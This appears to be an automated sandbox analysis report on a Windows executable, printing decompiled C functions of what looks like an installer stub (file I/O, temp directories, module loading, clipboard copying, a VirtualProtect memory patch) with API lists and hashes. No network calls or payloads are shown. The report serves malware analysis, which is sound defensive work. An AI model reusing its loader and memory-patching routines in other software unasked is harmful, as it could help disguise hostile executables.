                                                                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                            • Part of subcall function 0040583A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 1892508949-501415292
                                                                                                                          • Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                                                          • Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
                                                                                                                          • Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                                                          • Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                                          				long _v8;
                                                                                                                          				long _t21;
                                                                                                                          				long _t22;
                                                                                                                          				void* _t24;
                                                                                                                          				long _t26;
                                                                                                                          				int _t27;
                                                                                                                          				long _t28;
                                                                                                                          				void* _t30;
                                                                                                                          				long _t31;
                                                                                                                          				long _t32;
                                                                                                                          				long _t36;
                                                                                                                          
                                                                                                                          				_t21 = _a4;
                                                                                                                          				if(_t21 >= 0) {
                                                                                                                          					_t32 = _t21 +  *0x42f4b8;
                                                                                                                          					 *0x429464 = _t32;
                                                                                                                          					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                                                          				}
                                                                                                                          				_t22 = E004032BF(4);
                                                                                                                          				if(_t22 >= 0) {
                                                                                                                          					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
                                                                                                                          					if(_t24 == 0) {
                                                                                                                          						L18:
                                                                                                                          						_push(0xfffffffd);
                                                                                                                          						goto L19;
                                                                                                                          					} else {
                                                                                                                          						 *0x429464 =  *0x429464 + 4;
                                                                                                                          						_t36 = E004032BF(_a4);
                                                                                                                          						if(_t36 < 0) {
                                                                                                                          							L21:
                                                                                                                          							_t22 = _t36;
                                                                                                                          						} else {
                                                                                                                          							if(_a12 != 0) {
                                                                                                                          								_t26 = _a4;
                                                                                                                          								if(_t26 >= _a16) {
                                                                                                                          									_t26 = _a16;
                                                                                                                          								}
                                                                                                                          								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                                                          								if(_t27 != 0) {
                                                                                                                          									_t36 = _v8;
                                                                                                                          									 *0x429464 =  *0x429464 + _t36;
                                                                                                                          									goto L21;
                                                                                                                          								} else {
                                                                                                                          									goto L18;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_a4 <= 0) {
                                                                                                                          									goto L21;
                                                                                                                          								} else {
                                                                                                                          									while(1) {
                                                                                                                          										_t28 = _a4;
                                                                                                                          										if(_a4 >= 0x4000) {
                                                                                                                          											_t28 = 0x4000;
                                                                                                                          										}
                                                                                                                          										_v8 = _t28;
                                                                                                                          										if(E00405E5E( *0x40a01c, 0x41d460, _t28) == 0) {
                                                                                                                          											goto L18;
                                                                                                                          										}
                                                                                                                          										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
                                                                                                                          										if(_t30 == 0) {
                                                                                                                          											_push(0xfffffffe);
                                                                                                                          											L19:
                                                                                                                          											_pop(_t22);
                                                                                                                          										} else {
                                                                                                                          											_t31 = _v8;
                                                                                                                          											_a4 = _a4 - _t31;
                                                                                                                          											 *0x429464 =  *0x429464 + _t31;
                                                                                                                          											_t36 = _t36 + _t31;
                                                                                                                          											if(_a4 > 0) {
                                                                                                                          												continue;
                                                                                                                          											} else {
                                                                                                                          												goto L21;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										goto L22;
                                                                                                                          									}
                                                                                                                          									goto L18;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L22:
                                                                                                                          				return _t22;
                                                                                                                          			}














                                                                                                                          0x00000000
                                                                                                                          0x00403228
                                                                                                                          0x0040322b
                                                                                                                          0x00000000
                                                                                                                          0x00403231
                                                                                                                          0x00403236
                                                                                                                          0x0040323d
                                                                                                                          0x00403240
                                                                                                                          0x00403242
                                                                                                                          0x00403242
                                                                                                                          0x0040324f
                                                                                                                          0x00403259
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403262
                                                                                                                          0x00403269
                                                                                                                          0x00403281
                                                                                                                          0x004032ab
                                                                                                                          0x004032ab
                                                                                                                          0x0040326b
                                                                                                                          0x0040326b
                                                                                                                          0x0040326e
                                                                                                                          0x00403271
                                                                                                                          0x00403277
                                                                                                                          0x0040327d
                                                                                                                          0x00000000
                                                                                                                          0x0040327f
                                                                                                                          0x00000000
                                                                                                                          0x0040327f
                                                                                                                          0x0040327d
                                                                                                                          0x00000000
                                                                                                                          0x00403269
                                                                                                                          0x00000000
                                                                                                                          0x00403236
                                                                                                                          0x0040322b
                                                                                                                          0x00403226
                                                                                                                          0x0040321d
                                                                                                                          0x00403204
                                                                                                                          0x004032b9
                                                                                                                          0x004032bc

                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                                                                          • Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
                                                                                                                          • Opcode Fuzzy Hash: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                                                                          • Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 59%
                                                                                                                          			E00401389(signed int _a4) {
                                                                                                                          				intOrPtr* _t6;
                                                                                                                          				void* _t8;
                                                                                                                          				void* _t10;
                                                                                                                          				signed int _t11;
                                                                                                                          				void* _t12;
                                                                                                                          				signed int _t16;
                                                                                                                          				signed int _t17;
                                                                                                                          				void* _t18;
                                                                                                                          
                                                                                                                          				_t17 = _a4;
                                                                                                                          				while(_t17 >= 0) {
                                                                                                                          					_t6 = _t17 * 0x1c +  *0x42f490;
                                                                                                                          					if( *_t6 == 1) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_push(_t6); // executed
                                                                                                                          					_t8 = E00401434(); // executed
                                                                                                                          					if(_t8 == 0x7fffffff) {
                                                                                                                          						return 0x7fffffff;
                                                                                                                          					}
                                                                                                                          					_t10 = E0040136D(_t8);
                                                                                                                          					if(_t10 != 0) {
                                                                                                                          						_t11 = _t10 - 1;
                                                                                                                          						_t16 = _t17;
                                                                                                                          						_t17 = _t11;
                                                                                                                          						_t12 = _t11 - _t16;
                                                                                                                          					} else {
                                                                                                                          						_t12 = _t10 + 1;
                                                                                                                          						_t17 = _t17 + 1;
                                                                                                                          					}
                                                                                                                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                                          						 *0x42ec2c =  *0x42ec2c + _t12;
                                                                                                                          						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                                                          • Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
                                                                                                                          • Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                                                          • Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406656(signed int _a4) {
                                                                                                                          				struct HINSTANCE__* _t5;
                                                                                                                          				signed int _t10;
                                                                                                                          
                                                                                                                          				_t10 = _a4 << 3;
                                                                                                                          				_t8 =  *(_t10 + 0x40a258);
                                                                                                                          				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
                                                                                                                          				if(_t5 != 0) {
                                                                                                                          					L2:
                                                                                                                          					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
                                                                                                                          				}
                                                                                                                          				_t5 = E004065E8(_t8); // executed
                                                                                                                          				if(_t5 == 0) {
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				goto L2;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                                                            • Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                                                                                            • Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
                                                                                                                            • Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2547128583-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00405DE6(CHAR* _a4, long _a8, long _a12) {
                                                                                                                          				signed int _t5;
                                                                                                                          				void* _t6;
                                                                                                                          
                                                                                                                          				_t5 = GetFileAttributesA(_a4); // executed
                                                                                                                          				asm("sbb ecx, ecx");
                                                                                                                          				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                          				return _t6;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00405DEA
                                                                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 415043291-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405DC1(CHAR* _a4) {
                                                                                                                          				signed char _t3;
                                                                                                                          				signed char _t7;
                                                                                                                          
                                                                                                                          				_t3 = GetFileAttributesA(_a4); // executed
                                                                                                                          				_t7 = _t3;
                                                                                                                          				if(_t7 != 0xffffffff) {
                                                                                                                          					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004058B7(CHAR* _a4) {
                                                                                                                          				int _t2;
                                                                                                                          
                                                                                                                          				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                                                                          				if(_t2 == 0) {
                                                                                                                          					return GetLastError();
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
                                                                                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1375471231-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405E5E(void* _a4, void* _a8, long _a12) {
                                                                                                                          				int _t7;
                                                                                                                          				long _t11;
                                                                                                                          
                                                                                                                          				_t11 = _a12;
                                                                                                                          				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                          					return 0;
                                                                                                                          				} else {
                                                                                                                          					return 1;
                                                                                                                          				}
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D460,00415460,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405E8D(void* _a4, void* _a8, long _a12) {
                                                                                                                          				int _t7;
                                                                                                                          				long _t11;
                                                                                                                          
                                                                                                                          				_t11 = _a12;
                                                                                                                          				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                          					return 0;
                                                                                                                          				} else {
                                                                                                                          					return 1;
                                                                                                                          				}
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,00415F40,00415460,004033BF,00415460,00415F40,0040B8A0,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3934441357-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          
                                                                                                                          				 *0x70484038 = _a4;
                                                                                                                          				if(_a8 == 1) {
                                                                                                                          					VirtualProtect(0x7048404c, 4, 0x40, 0x7048403c); // executed
                                                                                                                          					 *0x7048404c = 0xc2;
                                                                                                                          					 *0x7048403c = 0;
                                                                                                                          					 *0x70484044 = 0;
                                                                                                                          					 *0x70484058 = 0;
                                                                                                                          					 *0x70484048 = 0;
                                                                                                                          					 *0x70484040 = 0;
                                                                                                                          					 *0x70484050 = 0;
                                                                                                                          					 *0x7048404e = 0;
                                                                                                                          				}
                                                                                                                          				return 1;
                                                                                                                          			}




                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(7048404C,00000004,00000040,7048403C), ref: 7048293F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 544645111-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040343E(long _a4) {
                                                                                                                          				long _t2;
                                                                                                                          
                                                                                                                          				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                                          				return _t2;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                          				struct HWND__* _v8;
                                                                                                                          				struct tagRECT _v24;
                                                                                                                          				void* _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				int _v40;
                                                                                                                          				int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				int _v52;
                                                                                                                          				void* _v56;
                                                                                                                          				void* _v64;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				struct HWND__* _t87;
                                                                                                                          				struct HWND__* _t89;
                                                                                                                          				long _t90;
                                                                                                                          				int _t95;
                                                                                                                          				int _t96;
                                                                                                                          				long _t99;
                                                                                                                          				void* _t102;
                                                                                                                          				intOrPtr _t124;
                                                                                                                          				struct HWND__* _t128;
                                                                                                                          				int _t150;
                                                                                                                          				int _t153;
                                                                                                                          				long _t157;
                                                                                                                          				struct HWND__* _t161;
                                                                                                                          				struct HMENU__* _t163;
                                                                                                                          				long _t165;
                                                                                                                          				void* _t166;
                                                                                                                          				char* _t167;
                                                                                                                          				char* _t168;
                                                                                                                          				int _t169;
                                                                                                                          
                                                                                                                          				_t87 =  *0x42ec24; // 0x0
                                                                                                                          				_t157 = _a8;
                                                                                                                          				_t150 = 0;
                                                                                                                          				_v8 = _t87;
                                                                                                                          				if(_t157 != 0x110) {
                                                                                                                          					__eflags = _t157 - 0x405;
                                                                                                                          					if(_t157 == 0x405) {
                                                                                                                          						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                                                                                          					}
                                                                                                                          					__eflags = _t157 - 0x111;
                                                                                                                          					if(_t157 != 0x111) {
                                                                                                                          						L17:
                                                                                                                          						__eflags = _t157 - 0x404;
                                                                                                                          						if(_t157 != 0x404) {
                                                                                                                          							L25:
                                                                                                                          							__eflags = _t157 - 0x7b;
                                                                                                                          							if(_t157 != 0x7b) {
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          							_t89 = _v8;
                                                                                                                          							__eflags = _a12 - _t89;
                                                                                                                          							if(_a12 != _t89) {
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                                                                                          							__eflags = _t90 - _t150;
                                                                                                                          							_a12 = _t90;
                                                                                                                          							if(_t90 <= _t150) {
                                                                                                                          								L36:
                                                                                                                          								return 0;
                                                                                                                          							}
                                                                                                                          							_t163 = CreatePopupMenu();
                                                                                                                          							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                                                                                          							_t95 = _a16;
                                                                                                                          							__eflags = _a16 - 0xffffffff;
                                                                                                                          							_t153 = _a16 >> 0x10;
                                                                                                                          							if(_a16 == 0xffffffff) {
                                                                                                                          								GetWindowRect(_v8,  &_v24);
                                                                                                                          								_t95 = _v24.left;
                                                                                                                          								_t153 = _v24.top;
                                                                                                                          							}
                                                                                                                          							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                                                                                          							__eflags = _t96 - 1;
                                                                                                                          							if(_t96 == 1) {
                                                                                                                          								_t165 = 1;
                                                                                                                          								__eflags = 1;
                                                                                                                          								_v56 = _t150;
                                                                                                                          								_v44 = 0x42a8b8;
                                                                                                                          								_v40 = 0x1000;
                                                                                                                          								_a4 = _a12;
                                                                                                                          								do {
                                                                                                                          									_a4 = _a4 - 1;
                                                                                                                          									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                                                                                          									__eflags = _a4 - _t150;
                                                                                                                          									_t165 = _t165 + _t99 + 2;
                                                                                                                          								} while (_a4 != _t150);
                                                                                                                          								OpenClipboard(_t150);
                                                                                                                          								EmptyClipboard();
                                                                                                                          								_t102 = GlobalAlloc(0x42, _t165);
                                                                                                                          								_a4 = _t102;
                                                                                                                          								_t166 = GlobalLock(_t102);
                                                                                                                          								do {
                                                                                                                          									_v44 = _t166;
                                                                                                                          									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                                                                                          									 *_t167 = 0xd;
                                                                                                                          									_t168 = _t167 + 1;
                                                                                                                          									 *_t168 = 0xa;
                                                                                                                          									_t166 = _t168 + 1;
                                                                                                                          									_t150 = _t150 + 1;
                                                                                                                          									__eflags = _t150 - _a12;
                                                                                                                          								} while (_t150 < _a12);
                                                                                                                          								GlobalUnlock(_a4);
                                                                                                                          								SetClipboardData(1, _a4);
                                                                                                                          								CloseClipboard();
                                                                                                                          							}
                                                                                                                          							goto L36;
                                                                                                                          						}
                                                                                                                          						__eflags =  *0x42ec0c - _t150; // 0x0
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							ShowWindow( *0x42f448, 8);
                                                                                                                          							__eflags =  *0x42f4ec - _t150;
                                                                                                                          							if( *0x42f4ec == _t150) {
                                                                                                                          								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
                                                                                                                          							}
                                                                                                                          							E004042AA(1);
                                                                                                                          							goto L25;
                                                                                                                          						}
                                                                                                                          						 *0x429c88 = 2;
                                                                                                                          						E004042AA(0x78);
                                                                                                                          						goto L20;
                                                                                                                          					} else {
                                                                                                                          						__eflags = _a12 - 0x403;
                                                                                                                          						if(_a12 != 0x403) {
                                                                                                                          							L20:
                                                                                                                          							return E00404338(_t157, _a12, _a16);
                                                                                                                          						}
                                                                                                                          						ShowWindow( *0x42ec10, _t150);
                                                                                                                          						ShowWindow(_v8, 8);
                                                                                                                          						E00404306(_v8);
                                                                                                                          						goto L17;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_v48 = _v48 | 0xffffffff;
                                                                                                                          				_v36 = _v36 | 0xffffffff;
                                                                                                                          				_t169 = 2;
                                                                                                                          				_v56 = _t169;
                                                                                                                          				_v52 = 0;
                                                                                                                          				_v44 = 0;
                                                                                                                          				_v40 = 0;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_t124 =  *0x42f454;
                                                                                                                          				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                                                                                          				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                                                                                          				 *0x42ec10 = GetDlgItem(_a4, 0x403);
                                                                                                                          				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
                                                                                                                          				_t128 = GetDlgItem(_a4, 0x3f8);
                                                                                                                          				 *0x42ec24 = _t128;
                                                                                                                          				_v8 = _t128;
                                                                                                                          				E00404306( *0x42ec10);
                                                                                                                          				 *0x42ec14 = E00404BF7(4);
                                                                                                                          				 *0x42ec2c = 0;
                                                                                                                          				GetClientRect(_v8,  &_v24);
                                                                                                                          				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                                                                                          				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                                                                          				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                                                          				if(_a12 >= 0) {
                                                                                                                          					SendMessageA(_v8, 0x1001, 0, _a12);
                                                                                                                          					SendMessageA(_v8, 0x1026, 0, _a12);
                                                                                                                          				}
                                                                                                                          				if(_a8 >= _t150) {
                                                                                                                          					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                                                                                          				}
                                                                                                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                          				_push(0x1b);
                                                                                                                          				E004042D1(_a4);
                                                                                                                          				if(( *0x42f45c & 0x00000003) != 0) {
                                                                                                                          					ShowWindow( *0x42ec10, _t150);
                                                                                                                          					if(( *0x42f45c & 0x00000002) != 0) {
                                                                                                                          						 *0x42ec10 = _t150;
                                                                                                                          					} else {
                                                                                                                          						ShowWindow(_v8, 8);
                                                                                                                          					}
                                                                                                                          					E00404306( *0x42ec08);
                                                                                                                          				}
                                                                                                                          				_t161 = GetDlgItem(_a4, 0x3ec);
                                                                                                                          				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                                                                                          				if(( *0x42f45c & 0x00000004) != 0) {
                                                                                                                          					SendMessageA(_t161, 0x409, _t150, _a8);
